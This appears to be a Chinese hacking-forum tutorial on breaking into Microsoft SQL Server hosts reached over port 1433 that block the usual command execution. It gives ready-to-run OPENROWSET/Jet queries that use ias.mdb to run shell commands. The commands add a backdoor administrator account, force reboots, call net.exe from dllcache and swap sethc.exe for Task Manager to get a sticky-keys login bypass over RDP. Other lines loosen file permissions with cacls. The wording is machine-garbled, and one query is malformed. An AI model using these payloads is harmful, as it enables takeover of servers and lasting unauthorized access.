沙盒情势 1433之黑吃黑杀手锏[网络技术]

1433好扫,但是难入侵啊!
不是127错误,就是号令被禁用. 不是贫乏哪个DLL文件,就是126错误.
哈 ,乃至连映像劫持、asshell、jobshell、seshell全部都利用不了,乃至SQL语句读
写注册表都不行,该若何办?
么 大概你忽视了一招 你们忘掉了沙盒情势的威力.
其实很多人也知道沙盒情势,但是没有深究.所以轻忽了它.
下面我介绍它:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user user pass /add")')
先看这个语句什么意思:意思是用
SQL语句履行c:\windows\system32\ias\ias.mdb这个文件,来履行
cmd.exe 来增添一个user 的用户.但很多时刻cmd被禁用了,所说当你履行这个语句
的时刻,会显示:无效的调用.
但假如cmd被禁,那接下来该怎么办???
你可以这样去尝试:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net user user pass /add")')
目前没用cmd.exe了 直接操纵c:\windows\system32\ias\ias.mdb来调用net 来增添用
户.在net.exe没被禁用的情形下,很多的机子是可以增添成功的,接下来
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators user /add")') 就OK了
假如调用net（或net1）成功 ,但是用user用户登陆不了,那你可以重启系统试试
语句可以这样写
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("shutdown -r -f -t 0")')
重启今后再增添一次用户.
假如 c:\windows\system32下的cmd.exe 、net、 net1都被禁用怎么办?
那你可以尝试调用c:\windows\system32\dllcache\下的 net net1
么SQL语句便可以这么写:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("dllcache\net user user pass /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("dllcache\net localgroup administrators user /add")')
很多情形下,到这里应当履行会成功了,dllcache\下的net net1 常人不会去禁用.
假如,连dllcache\目录下的net net1都被禁用   用户增添不了 又该怎么办?
························
按照是我 ,我会用c:\windows\system32\ias\ias.mdb 来调用system32下的xcopy.exe
来履行号令 ,先说说xcopy是干什么用的 xcopy号令可以用来复制替换文件.
因此我们可以调用xcopy号令 来复制替换掉sethc.exe.
所以 SQL语句便可以这么写:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")')
这句话的意思是: 通过履行c:\windows\system32\ias\ias.mdb来调用xcopy号令
xcopy taskmgr.exe sethc.exe /y 是把system32里的任务管理器替换成粘滞键.
按照我的经验,很多机子是可以替换成功的（前提是sethc.exe不被禁）,
接下来该怎么做 不用我说了 3389登陆上去 5次shift   则任务管理器就被调出来了
任务管理器一调出来 你想做啥都可以了·······

···那要讲的就到这···思绪是活的 我讲了在很多种情形下 的对策
但实际你还大概还会碰到其他的情形,不大概全部的情形我都一一讲授对策,不懂
的问我..

那假如 sethc.exe 也被禁止 怎么办?
那思绪也很简单,我们可以调用cacls.exe来设置权限,把sethc.exe net.exe 设置成
everyone都可以完好掌握 便可以了

所以便可以这样来写sql语句:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cacls c:\windows\system32\net.exe /e /t /g everyone:F')
这个思绪是完好精确的,但是常常履行不成功,
是因为我这个SQL衔接器不好,还是什么缘由
反正SQL语句写得太长,号令参数加的太多,就不会履行成功.
我用的是sqltools深度号令集成这个衔接器.
还有一点: 哪位兄弟 知不知道   调用system32里的哪个exe,可以履行删除号令
（不是 del 号令噶）